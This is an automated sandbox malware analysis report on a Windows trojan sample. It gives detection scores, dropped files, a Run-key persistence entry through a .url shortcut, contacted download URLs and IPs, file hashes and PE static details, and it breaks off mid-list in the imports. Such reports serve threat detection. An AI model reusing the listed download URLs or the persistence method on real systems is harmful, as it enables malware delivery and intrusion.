1a#U00bb.exe	35%	ReversingLabs	Win32.Trojan.Injuke
1a#U00bb.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\Public\Libraries\Djfypqyfx.exe	100%	Joe Sandbox ML
C:\Users\Public\Libraries\Djfypqyfx.exe	35%	ReversingLabs	Win32.Trojan.Injuke

Unpacked PE Files

Source	Detection	Scanner	Label	Download
5.2.cmd.exe.50410000.4.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
5.0.cmd.exe.50410000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
5.0.cmd.exe.50410000.1.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
0.2.1a#U00bb.exe.2637778.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
0.2.1a#U00bb.exe.26ac808.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
5.0.cmd.exe.50410000.2.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
5.0.cmd.exe.50410000.3.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://schemas.microsoft.co0	0%	Avira URL Cloud	safe
https://resimarmo.com/yakdatafilesloadsonedrivedocumentsuploadgoogledownload/Djfypqyfxwyivtfoakxovbb	0%	Avira URL Cloud	safe
https://resimarmo.com/yakdatafilesloadsonedrivedocumentsuploadgoogledownload/Djfypqyfxwyivtfoakxovbbaompeayl	0%	Avira URL Cloud	safe
www.bradwareham.com/2dou/	0%	Avira URL Cloud	safe
http://www.admiral-juegos.com/?fp=kkRBX1Mn5VLBDZ2cLYLxqMJfDhR5T9gHAiN23tab35viuN5iJaTX3x0tDUZhqU%2Fe	0%	Avira URL Cloud	safe
https://resimarmo.com/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
resimarmo.com	109.234.162.66	true	false		unknown
www.admiral-juegos.com	208.91.197.91	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://resimarmo.com/yakdatafilesloadsonedrivedocumentsuploadgoogledownload/Djfypqyfxwyivtfoakxovbbaompeayl	false	Avira URL Cloud: safe	unknown
www.bradwareham.com/2dou/	true	Avira URL Cloud: safe	low

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://schemas.microsoft.co0	explorer.exe, 00000014.00000000.398232671.000000000DDE3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.433438029.000000000DDE3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.460718387.000000000DDE3000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://resimarmo.com/yakdatafilesloadsonedrivedocumentsuploadgoogledownload/Djfypqyfxwyivtfoakxovbb	Djfypqyfx.exe, 0000000F.00000002.380461413.000000000349E000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.admiral-juegos.com/?fp=kkRBX1Mn5VLBDZ2cLYLxqMJfDhR5T9gHAiN23tab35viuN5iJaTX3x0tDUZhqU%2Fe	wscript.exe, 0000001E.00000002.546799518.00000000056A6000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://resimarmo.com/	1a#U00bb.exe, 00000000.00000003.261044820.00000000005A8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
109.234.162.66	resimarmo.com	France		50474	O2SWITCHFR	false

General Information

Joe Sandbox Version:	35.0.0 Citrine
Analysis ID:	680373
Start date and time: 08/08/202213:59:05	2022-08-08 13:59:05 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 45s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	1a#U00bb.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	34
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winEXE@13/4@2/1
EGA Information:	Successful, ratio: 50%
HDC Information:	Successful, ratio: 100% (good quality ratio 87.3%) Quality average: 71.9% Quality standard deviation: 33.2%
HCA Information:	Successful, ratio: 100% Number of executed functions: 18 Number of non-executed functions: 176
Cookbook Comments:	Found application associated with file extension: .exe Adjust boot time Enable AMSI

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
Excluded IPs from analysis (whitelisted): 23.211.6.115
Excluded domains from analysis (whitelisted): www.bing.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, client.wns.windows.com, fs.microsoft.com, login.live.com, store-images.s-microsoft.com, sls.update.microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
14:00:12	API Interceptor	1x Sleep call for process: 1a#U00bb.exe modified
14:00:24	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Djfypqyfx C:\Users\Public\Libraries\xfyqpyfjD.url
14:00:32	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Djfypqyfx C:\Users\Public\Libraries\xfyqpyfjD.url
14:00:34	API Interceptor	2x Sleep call for process: Djfypqyfx.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
109.234.162.66	tesla.exe	Get hash	malicious	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
O2SWITCHFR	Technical Specifications & Drawings.exe	Get hash	malicious	Browse	109.234.162.62
	nuevo_orden.xlsx.exe	Get hash	malicious	Browse	109.234.164.224
	SecuriteInfo.com.W32.AIDetectNet.01.17983.exe	Get hash	malicious	Browse	109.234.164.224
	iOW5Sp6ul4.exe	Get hash	malicious	Browse	109.234.164.224
	DHL Shipment S2104751056.exe	Get hash	malicious	Browse	109.234.164.217
	dxnSweoisD.exe	Get hash	malicious	Browse	109.234.164.72
	two_salary.exe	Get hash	malicious	Browse	109.234.164.72
	https://0bit.cc/ZWJc	Get hash	malicious	Browse	109.234.161.33
	https://reurl.cc/anGKD3	Get hash	malicious	Browse	109.234.161.33
	RFQ08022022.exe	Get hash	malicious	Browse	109.234.164.212
	Purchase Order.exe	Get hash	malicious	Browse	109.234.160.64
	Remittance_3239934.xlsx	Get hash	malicious	Browse	109.234.164.202
	awb_receipt_tracking_27022022_9985193500000000.xlsx	Get hash	malicious	Browse	109.234.164.200
	SALARY_RECEIPT.exe	Get hash	malicious	Browse	109.234.161.241
	VSL_MV HANNOR.exe	Get hash	malicious	Browse	109.234.164.204
	stage4.exe	Get hash	malicious	Browse	109.234.160.63
	payment.exe	Get hash	malicious	Browse	109.234.164.201
	Order Information.exe	Get hash	malicious	Browse	109.234.164.202
	Swift copy.exe	Get hash	malicious	Browse	109.234.160.164
	ENQUIRYSMRT119862021-ERW PIPES.pdf.exe	Get hash	malicious	Browse	185.246.46.93

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	attachments.html	Get hash	malicious	Browse	109.234.162.66
	purchase order.scr	Get hash	malicious	Browse	109.234.162.66
	Kihaa Maldives Document#%$9794.exe	Get hash	malicious	Browse	109.234.162.66
	ASLF1SR00116 40HC 21T05 DALIAN TO GENOVA..exe	Get hash	malicious	Browse	109.234.162.66
	purchase order.scr	Get hash	malicious	Browse	109.234.162.66
	RFQ_0029388827772_Square General Contracting.exe	Get hash	malicious	Browse	109.234.162.66
	Drawing_0029388827772_Square_General_ContractingDrawing_0029388827772_Square_General_Contracting.exe	Get hash	malicious	Browse	109.234.162.66
	http://inveraray-inn.co.uk	Get hash	malicious	Browse	109.234.162.66
	NOA_-_CNCAPLC_-_Notice_of_Arrival_-_HENG_HUI_5__-_0QABYN1NC_5631126608435000.PDF.exe	Get hash	malicious	Browse	109.234.162.66
	Purchase Inquiry_pdf.ppa	Get hash	malicious	Browse	109.234.162.66
	SecuriteInfo.com.W32.AIDetectNet.01.4744.exe	Get hash	malicious	Browse	109.234.162.66
	SecuriteInfo.com.W32.AIDetect.malware2.12327.exe	Get hash	malicious	Browse	109.234.162.66
	9wjhz2j3et.exe	Get hash	malicious	Browse	109.234.162.66
	https://objectstorage.eu-frankfurt-1.oraclecloud.com/n/frtdvcg6uzqm/b/bucket-20220728-1700/o/blackie.html#joe.smith@fake.gov.au	Get hash	malicious	Browse	109.234.162.66
	kTXUhUk3dm.exe	Get hash	malicious	Browse	109.234.162.66
	https://objectstorage.eu-frankfurt-1.oraclecloud.com/n/frtdvcg6uzqm/b/bucket-20220728-1700/o/blackie.html#joe.smith@fake.gov.au	Get hash	malicious	Browse	109.234.162.66
	Nx6jI5VUNl.exe	Get hash	malicious	Browse	109.234.162.66
	rKEgLUOUBV.exe	Get hash	malicious	Browse	109.234.162.66
	2q26XBTFHo.exe	Get hash	malicious	Browse	109.234.162.66
	mJL2Zwr24b.exe	Get hash	malicious	Browse	109.234.162.66

Dropped Files

⊘No context

Created / dropped Files

C:\Users\Public\Libraries\Djfypqyfx.exe

Download File

Process:	C:\Users\user\Desktop\1a#U00bb.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	732672
Entropy (8bit):	6.987815633679031
Encrypted:	false
SSDEEP:	12288:KmhCsMYEubn0UsjX4gaYv+tdqw1xBXEtFSOUHU3PiyMcCd5sY3nk1Nz:xnMYEbTjfaxtdqQVESreixHfk1Nz
MD5:	251EF95E26D436E7BFE64636978DCC4B
SHA1:	20E2EA6899D155780231ABDE49730046865C046B
SHA-256:	15E1D48F4BA136AA876C88C4FB16FE160795F40E9850252CE1A4F3A695B4FCB7
SHA-512:	01BD210F140BF0A242B8442CFF905D0FE990209DB3E4F3ED08973400A7F43FB93C4FDB85CDEA526258D9ED73900932BDCA38B092F0D0297DCF6D8AA7A951784E
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 35%
Reputation:	low
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B.....................X....................@..............................................@...........................0...(..............................0b...........................p......................t7..4............................text............................... ..`.itext.............................. ..`.data...............................@....bss.....7...............................idata...(...0.....................@....tls....4....`...........................rdata.......p......................@..@.reloc..0b.......d..................@..B.rsrc................\..............@..@....................................@..@................................................................................................

C:\Users\Public\Libraries\Djfypqyfx.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\1a#U00bb.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\Public\Libraries\xfyqpyfjD.url

Download File

Process:	C:\Users\user\Desktop\1a#U00bb.exe
File Type:	MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Djfypqyfx.exe">), ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	101
Entropy (8bit):	5.0761549879086045
Encrypted:	false
SSDEEP:	3:HRAbABGQYmTWAX+rSF55i0XMSkiovsGKd5nuAR:HRYFVmTWDyzyvsb5nPR
MD5:	49BCF74A549D6892E2B743685FB4F3CA
SHA1:	32D7ABBC81D5F7843BDF325B6EBFCEF1ABA5BEA4
SHA-256:	A83037751B847529664898F347EA4C1E3564BF83A721E50317139A7211AAB188
SHA-512:	48830BE8A80A7DE12F68A0A1F3B7EE10426F3E865403BAC8B587DCCDA4851CFE4B294E3712405937F434FB408A611DC0DD87B58B6B5AE2C29ACE908D9235D35A
Malicious:	false
Yara Hits:	Rule: Methodology_Shortcut_HotKey, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\Public\Libraries\xfyqpyfjD.url, Author: @itsreallynick (Nick Carr) Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\Public\Libraries\xfyqpyfjD.url, Author: @itsreallynick (Nick Carr)
Preview:	[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Djfypqyfx.exe"..IconIndex=16..HotKey=34..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\Djfypqyfxwyivtfoakxovbbaompeayl[1]

Download File

Process:	C:\Users\user\Desktop\1a#U00bb.exe
File Type:	data
Category:	dropped
Size (bytes):	177627
Entropy (8bit):	7.847938887801003
Encrypted:	false
SSDEEP:	3072:P7E4Pgzvt/qLvk5PVV+5SFNSojvBXTlq5MfXKL/5oWzuaMTpF3TQ:P7EisqLshv+5SLL7BfXsNShH3T
MD5:	9101F43ECBD02C1AF9AA07C17A39C4E7
SHA1:	1B138E7D5026112F626EFE9A86DB4202DE5EA070
SHA-256:	9935397D6879082B519359131268E9ED7F67BB53354FD99B35BDD8643CEAC488
SHA-512:	FEA1FD35C30F166BCDDE19E9B2E1D61EBEA4E35324E27C11AB8B9DBAAF82AE1C5B992BF43FC5D3814A8B199476B023D4998BAF7BFDDAB94D88067F6DDDB52795
Malicious:	false
Preview:	ca..y. ..y..&&.y.]._ca.&&.y]...]..y.(...:..8.<..4:...6.@..@...(26.....,4..(:.6..46...,2.<>,0..,..28..(8....*2,.4ca..y. ..y..&&.y.]._ca.&&.y]...]..y}..@.8@..>@0...6(2.6...(64.,(@.ca..y. ..y..&&.y.]._ca.&&.y]...]..y.b...P..R.V..^P...\.J..J...bX\.....f^..bP.\..^\...fX.`VTfZ..f.X`R..bR....`Xf.^.b...P..R.V..^P...\.J..J...bX\.....f^..bP.\..^\...fX.`VTfZ..f.X`R..bR....`Xf.^.b...P..R.V..^P...\.J..J...bX\.....f^..bP.\..^\...fX.`VTfZ..f.X`R..bR....`Xf.^.b...P..R.V..^P...\.J..J...bX\.....f^..bP.\..^\...fX.`VTfZ..f.X`R..bR....`Xf.^.b...P..R.V..^P...\.J..J...bX\.....f^..bP.\..^\...fX.`VTfZ..f.X`R..bR....`Xf.^.b...P..R.V..^P...\.J..J...bX\.....f^..bP.\..^\...fX.`VTfZ..f.X`R..bR....`Xf.^.b...P..R.V..^P...\.J..J...bX\.....f^..bP.\..^\...fX.`VTfZ..f.X`R..bR....`Xf.^.b...P..R.V..^P...\.J..J...bX\.....f^..bP.\..^\...fX.`VTfZ..f.X`R..bR....`Xf.^.b...P..R.V..^P...\.J..J...bX\.....f^..bP.\..^\...fX.`VTfZ..f.X`R..bR....`Xf.^.b...P..R.V..^P...\.J..J...bX\.....f^..bP.\..^\...fX.`VTfZ..f.X`R..bR.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.987815633679031
TrID:	Win32 Executable (generic) a (10002005/4) 99.81% Windows Screen Saver (13104/52) 0.13% Win16/32 Executable Delphi generic (2074/23) 0.02% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02%
File name:	1a#U00bb.exe
File size:	732672
MD5:	251ef95e26d436e7bfe64636978dcc4b
SHA1:	20e2ea6899d155780231abde49730046865c046b
SHA256:	15e1d48f4ba136aa876c88c4fb16fe160795f40e9850252ce1a4f3a695b4fcb7
SHA512:	01bd210f140bf0a242b8442cff905d0fe990209db3e4f3ed08973400a7f43fb93c4fdb85cdea526258d9ed73900932bdca38b092f0d0297dcf6d8aa7a951784e
SSDEEP:	12288:KmhCsMYEubn0UsjX4gaYv+tdqw1xBXEtFSOUHU3PiyMcCd5sY3nk1Nz:xnMYEbTjfaxtdqQVESreixHfk1Nz
TLSH:	68F49EF0E3A010F7CD622B77CC0ADE65E526BE50296C558BABE83EC84F755C1291B187
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	18db1ccadc5c5b18

Static PE Info

General

Entrypoint:	0x46e790
Entrypoint Section:	.itext
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:
Time Stamp:	0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	cc1fadbd23c2bfd0a0322aa7e67d1d3f

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFF0h
mov eax, 0046D498h
call 00007F630D024BD9h
mov eax, dword ptr [0049E398h]
mov eax, dword ptr [eax]
call 00007F630D07212Dh
mov eax, dword ptr [0049E398h]
mov eax, dword ptr [eax]
mov edx, 0046E7F0h
call 00007F630D071BB4h
mov ecx, dword ptr [0049E370h]
mov eax, dword ptr [0049E398h]
mov eax, dword ptr [eax]
mov edx, dword ptr [0046C444h]
call 00007F630D07211Ch
mov eax, dword ptr [0049E398h]
mov eax, dword ptr [eax]
call 00007F630D072190h
call 00007F630D022C9Fh
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa3000	0x2804	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xaf000	0xd200	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xa8000	0x6230	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xa7000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xa3774	0x634	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6c6d0	0x6c800	False	0.5343349474366359	data	6.574486068299734	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext	0x6e000	0x804	0xa00	False	0.5125	data	5.495016511395614	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x6f000	0x2f518	0x2f600	False	0.5348264346965699	data	7.3003201293654065	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss	0x9f000	0x37f8	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0xa3000	0x2804	0x2a00	False	0.3078497023809524	data	4.926344413190151	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0xa6000	0x34	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0xa7000	0x18	0x200	False	0.05078125	data	0.2108262677871819	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xa8000	0x6230	0x6400	False	0.638359375	data	6.654765582765188	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc	0xaf000	0xd200	0xd200	False	0.10805431547619047	data	3.352529991615067	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_CURSOR	0xaf71c	0x134	data	English	United States
RT_CURSOR	0xaf850	0x134	data	English	United States
RT_CURSOR	0xaf984	0x134	data	English	United States
RT_CURSOR	0xafab8	0x134	data	English	United States
RT_CURSOR	0xafbec	0x134	data	English	United States
RT_CURSOR	0xafd20	0x134	data	English	United States
RT_CURSOR	0xafe54	0x134	data	English	United States
RT_ICON	0xaff88	0x94a8	data
RT_ICON	0xb9430	0x468	GLS_BINARY_LSB_FIRST
RT_STRING	0xb9898	0x2f8	data
RT_STRING	0xb9b90	0xbc	data
RT_STRING	0xb9c4c	0x110	data
RT_STRING	0xb9d5c	0x4a0	data
RT_STRING	0xba1fc	0x348	data
RT_STRING	0xba544	0x394	data
RT_STRING	0xba8d8	0x3f8	data
RT_STRING	0xbacd0	0xf4	data
RT_STRING	0xbadc4	0xc4	data
RT_STRING	0xbae88	0x22c	data
RT_STRING	0xbb0b4	0x3b4	data
RT_STRING	0xbb468	0x368	data
RT_STRING	0xbb7d0	0x2b8	data
RT_RCDATA	0xbba88	0x10	data
RT_RCDATA	0xbba98	0x2d8	data
RT_RCDATA	0xbbd70	0x1e5	Delphi compiled form 'TDuckForm'
RT_GROUP_CURSOR	0xbbf58	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0xbbf6c	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0xbbf80	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0xbbf94	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0xbbfa8	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0xbbfbc	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0xbbfd0	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_ICON	0xbbfe4	0x22	data

Imports

DLL	Import
oleaut32.dll	SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegCloseKey
user32.dll	GetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
kernel32.dll	GetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
kernel32.dll	TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
user32.dll	CreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, ChangeDisplaySettingsA, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
msimg32.dll	TransparentBlt, AlphaBlend
gdi32.dll	UnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExtTextOutA, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
version.dll	VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
kernel32.dll	lstrcpyA, WritePrivateProfileStringA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalFindAtomA, GlobalDeleteAtom, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetPrivateProfileStringA, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileAttributesA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, 